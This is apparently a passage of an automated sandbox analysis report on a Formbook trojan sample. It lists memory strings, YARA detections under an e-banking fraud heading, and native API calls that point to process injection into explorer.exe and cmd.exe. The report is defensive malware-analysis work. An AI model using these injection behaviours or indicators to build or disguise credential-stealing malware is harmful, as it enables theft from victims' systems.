          Source: explorer.exe, 00000003.00000000.1728291050.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
          Source: explorer.exe, 00000003.00000002.4180055463.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1738643727.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://outlook.com_
          Source: explorer.exe, 00000003.00000002.4180055463.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1738643727.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000003.00000002.4180055463.000000000C557000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://wns.windows.com/L
          Source: explorer.exe, 00000003.00000002.4180055463.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1738643727.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://word.office.com
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
          Source: explorer.exe, 00000003.00000000.1728291050.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
          Source: explorer.exe, 00000003.00000002.4172464480.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

          E-Banking Fraud

          Source: Yara match | File source: 2.2.n0srYVYMDI.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.n0srYVYMDI.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.4169039810.0000000003380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.4169280068.0000000003780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.1726895597.0000000004361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 2.2.n0srYVYMDI.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.n0srYVYMDI.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.n0srYVYMDI.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.n0srYVYMDI.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.n0srYVYMDI.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.n0srYVYMDI.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.4169039810.0000000003380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.4169039810.0000000003380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.4169039810.0000000003380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.4169280068.0000000003780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.4169280068.0000000003780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.4169280068.0000000003780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1726895597.0000000004361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1726895597.0000000004361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1726895597.0000000004361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: n0srYVYMDI.exe PID: 7516, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: n0srYVYMDI.exe PID: 7664, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: cmd.exe PID: 7796, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0041A320 NtCreateFile,2_2_0041A320
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0041A3D0 NtReadFile,2_2_0041A3D0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0041A450 NtClose,2_2_0041A450
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0041A500 NtAllocateVirtualMemory,2_2_0041A500
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0041A44B NtClose,2_2_0041A44B
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0041A4FB NtAllocateVirtualMemory,2_2_0041A4FB
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792B60 NtClose,LdrInitializeThunk,2_2_01792B60
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792BF0 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_01792BF0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792AD0 NtReadFile,LdrInitializeThunk,2_2_01792AD0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792D30 NtUnmapViewOfSection,LdrInitializeThunk,2_2_01792D30
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792D10 NtMapViewOfSection,LdrInitializeThunk,2_2_01792D10
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_01792DF0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792DD0 NtDelayExecution,LdrInitializeThunk,2_2_01792DD0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_01792C70
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792CA0 NtQueryInformationToken,LdrInitializeThunk,2_2_01792CA0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792F30 NtCreateSection,LdrInitializeThunk,2_2_01792F30
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792FE0 NtCreateFile,LdrInitializeThunk,2_2_01792FE0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792FB0 NtResumeThread,LdrInitializeThunk,2_2_01792FB0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792F90 NtProtectVirtualMemory,LdrInitializeThunk,2_2_01792F90
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_01792EA0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792E80 NtReadVirtualMemory,LdrInitializeThunk,2_2_01792E80
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01794340 NtSetContextThread,2_2_01794340
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01794650 NtSuspendThread,2_2_01794650
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792BE0 NtQueryValueKey,2_2_01792BE0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792BA0 NtEnumerateValueKey,2_2_01792BA0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792B80 NtQueryInformationFile,2_2_01792B80
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792AF0 NtWriteFile,2_2_01792AF0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792AB0 NtWaitForSingleObject,2_2_01792AB0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792D00 NtSetInformationFile,2_2_01792D00
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792DB0 NtEnumerateKey,2_2_01792DB0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792C60 NtCreateKey,2_2_01792C60
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792C00 NtQueryInformationProcess,2_2_01792C00
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792CF0 NtOpenProcess,2_2_01792CF0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792CC0 NtQueryVirtualMemory,2_2_01792CC0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792F60 NtCreateProcessEx,2_2_01792F60
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792FA0 NtQuerySection,2_2_01792FA0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792E30 NtWriteVirtualMemory,2_2_01792E30
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792EE0 NtQueueApcThread,2_2_01792EE0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01793010 NtOpenDirectoryObject,2_2_01793010
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01793090 NtSetValueKey,2_2_01793090
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017935C0 NtCreateMutant,2_2_017935C0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017939B0 NtGetContextThread,2_2_017939B0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01793D70 NtOpenThread,2_2_01793D70
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01793D10 NtOpenProcessToken,2_2_01793D10
          Source: C:\Windows\explorer.exeCode function: 3_2_10DC4E12 NtProtectVirtualMemory,3_2_10DC4E12
          Source: C:\Windows\explorer.exeCode function: 3_2_10DC3232 NtCreateFile,3_2_10DC3232
          Source: C:\Windows\explorer.exeCode function: 3_2_10DC4E0A NtProtectVirtualMemory,3_2_10DC4E0A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00254823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,4_2_00254823
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0025643A NtOpenThreadToken,NtOpenProcessToken,NtClose,4_2_0025643A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00267460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,4_2_00267460
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002564CA NtQueryInformationToken,4_2_002564CA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0026A135 NtSetInformationFile,4_2_0026A135
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00256500 NtQueryInformationToken,NtQueryInformationToken,4_2_00256500
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0026C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,4_2_0026C1FA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00244E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,4_2_00244E3B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00254759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,4_2_00254759
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12B60 NtClose,LdrInitializeThunk,4_2_03C12B60
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12AD0 NtReadFile,LdrInitializeThunk,4_2_03C12AD0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12FE0 NtCreateFile,LdrInitializeThunk,4_2_03C12FE0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12F30 NtCreateSection,LdrInitializeThunk,4_2_03C12F30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_03C12EA0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12DD0 NtDelayExecution,LdrInitializeThunk,4_2_03C12DD0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_03C12DF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12D10 NtMapViewOfSection,LdrInitializeThunk,4_2_03C12D10
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_03C12CA0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12C60 NtCreateKey,LdrInitializeThunk,4_2_03C12C60
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_03C12C70
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C135C0 NtCreateMutant,LdrInitializeThunk,4_2_03C135C0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C14340 NtSetContextThread,4_2_03C14340
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C14650 NtSuspendThread,4_2_03C14650
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12BE0 NtQueryValueKey,4_2_03C12BE0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12BF0 NtAllocateVirtualMemory,4_2_03C12BF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12B80 NtQueryInformationFile,4_2_03C12B80
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12BA0 NtEnumerateValueKey,4_2_03C12BA0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12AF0 NtWriteFile,4_2_03C12AF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12AB0 NtWaitForSingleObject,4_2_03C12AB0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12F90 NtProtectVirtualMemory,4_2_03C12F90
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12FA0 NtQuerySection,4_2_03C12FA0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12FB0 NtResumeThread,4_2_03C12FB0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12F60 NtCreateProcessEx,4_2_03C12F60
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12EE0 NtQueueApcThread,4_2_03C12EE0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12E80 NtReadVirtualMemory,4_2_03C12E80
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12E30 NtWriteVirtualMemory,4_2_03C12E30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12DB0 NtEnumerateKey,4_2_03C12DB0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12D00 NtSetInformationFile,4_2_03C12D00
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12D30 NtUnmapViewOfSection,4_2_03C12D30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12CC0 NtQueryVirtualMemory,4_2_03C12CC0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12CF0 NtOpenProcess,4_2_03C12CF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12C00 NtQueryInformationProcess,4_2_03C12C00
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C13090 NtSetValueKey,4_2_03C13090
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C13010 NtOpenDirectoryObject,4_2_03C13010
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C139B0 NtGetContextThread,4_2_03C139B0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C13D70 NtOpenThread,4_2_03C13D70
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C13D10 NtOpenProcessToken,4_2_03C13D10
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F7A3D0 NtReadFile,4_2_02F7A3D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F7A320 NtCreateFile,4_2_02F7A320
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F7A450 NtClose,4_2_02F7A450
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F7A44B NtClose,4_2_02F7A44B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03AB9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,4_2_03AB9BAF
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03ABA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,4_2_03ABA036
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03AB9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_03AB9BB2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03ABA042 NtQueryInformationProcess,4_2_03ABA042
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00244C10: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z,4_2_00244C10
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00249458 InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,lstrcmpW,CreateProcessW,CloseHandle,GetLastError,GetLastError,DeleteProcThreadAttributeList,_local_unwind4,CreateProcessAsUserW,GetLastError,CloseHandle,4_2_00249458
Source: C:\Windows\SysWOW64\cmd.exe | Code function: String function: 03C4EA12 appears 86 times
Source: C:\Windows\SysWOW64\cmd.exe | Code function: String function: 03C15130 appears 58 times
Source: C:\Windows\SysWOW64\cmd.exe | Code function: String function: 03BCB970 appears 262 times
Source: C:\Windows\SysWOW64\cmd.exe | Code function: String function: 03C5F290 appears 103 times
Source: C:\Windows\SysWOW64\cmd.exe | Code function: String function: 03C27E54 appears 99 times
Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: String function: 017CEA12 appears 86 times
Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: String function: 017DF290 appears 103 times
Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: String function: 01795130 appears 58 times
Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: String function: 017A7E54 appears 107 times
Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: String function: 0174B970 appears 262 times
Source: n0srYVYMDI.exe, 00000000.00000002.1730830039.0000000007C70000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs n0srYVYMDI.exe
Source: n0srYVYMDI.exe, 00000000.00000002.1725254905.00000000016EE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs n0srYVYMDI.exe
Source: n0srYVYMDI.exe, 00000000.00000002.1726895597.0000000004361000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs n0srYVYMDI.exe
Source: n0srYVYMDI.exe, 00000000.00000000.1698934984.0000000000F22000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameNXaN.exe8 vs n0srYVYMDI.exe
Source: n0srYVYMDI.exe, 00000002.00000002.1787623438.00000000016DE000.00000040.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameCmd.Exej% vs n0srYVYMDI.exe
Source: n0srYVYMDI.exe, 00000002.00000002.1787974045.000000000184D000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs n0srYVYMDI.exe
Source: n0srYVYMDI.exe | Binary or memory string: OriginalFilenameNXaN.exe8 vs n0srYVYMDI.exe
Source: n0srYVYMDI.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 2.2.n0srYVYMDI.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
